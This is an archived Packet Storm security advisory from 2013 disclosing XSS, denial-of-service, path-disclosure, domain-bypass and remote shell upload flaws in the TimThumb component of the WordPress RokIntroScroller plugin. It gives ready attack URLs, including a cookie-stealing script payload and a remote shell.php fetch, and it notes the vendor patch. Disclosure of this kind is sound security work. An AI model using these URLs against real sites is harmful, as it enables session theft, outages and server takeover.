what you don't know can hurt you

WordPress RokIntroScroller 1.8 XSS / DoS / Disclosure / Upload

WordPress RokIntroScroller 1.8 XSS / DoS / Disclosure / Upload
Posted Sep 19, 2013
Authored by MustLive

WordPress RokIntroScroller plugin versions 1.8 and below suffer from cross site scripting, denial of service, path disclosure, abuse of functionality, and remote shell upload vulnerabilities.

tags | exploit, remote, denial of service, shell, vulnerability, xss
MD5 | bb5b9f500ada070db5eb8ac120607d01

WordPress RokIntroScroller 1.8 XSS / DoS / Disclosure / Upload

Change Mirror Download
Hello list!

I want to warn you about multiple vulnerabilities in plugin RokIntroScroller
for WordPress. In August 2012 I wrote about multiple vulnerabilities in
RokBox for WordPress (http://securityvulns.ru/docs28871.html). These
vulnerabilities are similar, since the same developers put the same
vulnerable TimThumb into another their plugin (vulnerabilities in which I
disclosed already in 2011).

These are Cross-Site Scripting, Full path disclosure, Abuse of
Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In July 2013 developers released a patch for their plugins and themes with
TimThumb
(http://www.rockettheme.com/wordpress-updates/1871-security-patch-for-wordpress-timthumb),
which can be used to fix these vulnerabilities (except the last FPD).

-------------------------
Affected products:
-------------------------

Vulnerable are RokIntroScroller 1.8 and previous versions (to attacks on
TimThumb and all versions are vulnerable to FPD).

Besides standalone WP plugin, this web application comes as part of the
themes. Many of 56 RocketTheme's WP themes
(http://www.rockettheme.com/wordpress-themes) use RokIntroScroller and old
versions of these themes are vulnerable to attacks on TimThumb (and all
versions of them are vulnerable to FPD).

-------------------------
Affected vendors:
-------------------------

RocketTheme
http://www.rockettheme.com

----------
Details:
----------

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site/page.png&h=1&w=1111111

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site.flickr.com&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1
(bypass of restriction on domain, if such restriction is turned on)

About such Abuse of Functionality and Denial of Service vulnerabilities you
can read in my article Using of the sites for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
For such attacks my tool DAVOSET (http://websecurity.com.ua/davoset/) can be
used.

Arbitrary File Upload (WASC-31):

http://site/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://flickr.com.site.com/shell.php

This Arbitrary File Upload vulnerability in TimThumb was disclosed after 3,5
months after my disclosure of previous holes.

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    13 Files
  • 28
    May 28th
    18 Files
  • 29
    May 29th
    17 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close